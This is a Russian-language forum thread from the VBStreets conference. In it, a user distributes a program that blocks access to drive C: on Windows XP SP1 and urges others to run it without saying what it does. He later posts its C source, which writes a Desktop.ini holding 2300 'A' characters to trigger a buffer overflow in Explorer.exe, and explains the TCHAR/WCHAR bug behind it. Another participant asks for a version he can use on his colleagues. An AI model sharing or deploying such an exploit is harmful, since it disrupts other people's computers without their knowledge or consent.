Конференция VBStreets

[SeRRg]

Всем иметелям WindowsXP SP1 посвящается:

Я тут недавно натолкнулся на описание "дырки" в Windows.
По-моему классная весчь, тем более всего 10 строк кода на VC++.
Короче, предлагаю всем желающим запустить ее у себя и заценить эффект.
Кто сможет догадаться, в чем дырка, может взять конфетку - хорошо комп лечит.
А кто не сможет... Запустите еще раз, и эффект исчезнет.
НО. скопируйте прогу на раб.стол., и ЗАПУСКАЙТЕ С НЕГО, а иначе придется
мурыжиться.

Файл прилагается, исходники м.б. потом выложу, когда опрос закончится.
У вас 10 дней, чтобы голосовать.

[A.A.Z.]

Удалено по просьбе SeRRg

[Amed]

У меня тоже ничего... Кажется, у меня с A.A.Z. не SP1

[SeRRg]

Может, у вас уже заплатки нужные стоят?
У меня Windows XP Professional Edition SP1 без всяких заплаток. И все идет.

A.A.Z, отредактируй топик, не мешай людям думать .

[Tarik]

А запускать надо именно с Рабочего стола и под стандартным шеллом? А то у меня Aston, я скопировал в Docs and settings\tarik\Рабочий стол - вроде ничего ...

[ilia_night]

а что прога делает

[Sirik]

Да, прога то что надо. А для Окон 9x у Вас ничего нет ???
Я был в ужасе, когда не увидел свой С!!!
Хочу, чтобы коллеги тоже это прочувствовали. Проблемма в том, что у них стоят либо Me, либо 98.
Помогите!!!

[SeRRg]

Tarik: под стандартным Shell'ом.
Запускать можно откуда угодно с диска C:\,
но потом - смотри ниже.

ilia_nightЧто делает: А вы попробуйте открыть диск C:\
Если откроется, значит у вас не пошла прога.[/b]

[hCORe]

У меня все нормально, диск C: не исчезает
Я так думаю, что здесь имела место модификация параметра реестра, отвечавшего за политики отображения значков в "моем компьютере". Вполне возможно, правда?
И, конечно, может быть банальное переполнение буфера

[Sirik]

На счёт отображения значков... я не думаю: у меня диск не открывался даже в Total'е, и в VC.
Может действительно переполнение...

[Urvin]

Фига-а-а-а-а-ф-ф-ф-ф-ф....
Куызусе блин Respect

[hCORe]

Ошибка в какой-то из системных служб? RPC например

[Tarik]

Или в Диспетчере логических дисков...

[SeRRg]

Подсказка. Переустановка Windows не поможет, замена всех файлов из архива - тоже.

[A.A.Z.]

Может, буква диска сменяется на нулевую?
Как в Partition Magic - можно вообще убрать букву

[SeRRg]

Внимание: ИСХОДНИКИ.

#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

char path[256];
char evil[BUFF+1]="";
FILE *bof;
struct stat st;
strcpy(path,"\\pont");
mkdir(path);
SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

strcat(path,"\\Desktop.ini");
if (stat(path,&st)==0)
{ remove(path); exit(1);}//just execute this program twice to remote this file
bof=fopen(path,"w");
fputs("[.ShellClassInfo]\n",bof);
memset(evil,'A',BUFF);
fputs(evil,bof);
fclose(bof);
}

Т. Е. она просто создает определенный файл (desktop.ini) в директории pont,
как заметил A.A.Z.

Описание функции, которая вызывается в процессе парсинга desktop.ini (описание взято из MSDN)

DWORD GetPrivateProfileSection(
LPCTSTR lpAppName,
LPTSTR lpReturnedString,
DWORD nSize,
LPCTSTR lpFileName
);

Microsoft специфицирует параметр nSize следующим образом: размер буфера, на который указывает lpReturnedString, в TCHAR’ах. Что и является корнем всей проблемы, так как при использовании UNICODE кодировки размер должен считаться WCHAR’ами. То есть 1 для nSize равен sizeof(TCHAR) а должно быть sizeof(WCHAR).

В результате: Переполнение буфера в Explorer.exe со всеми вытекающими последствиями.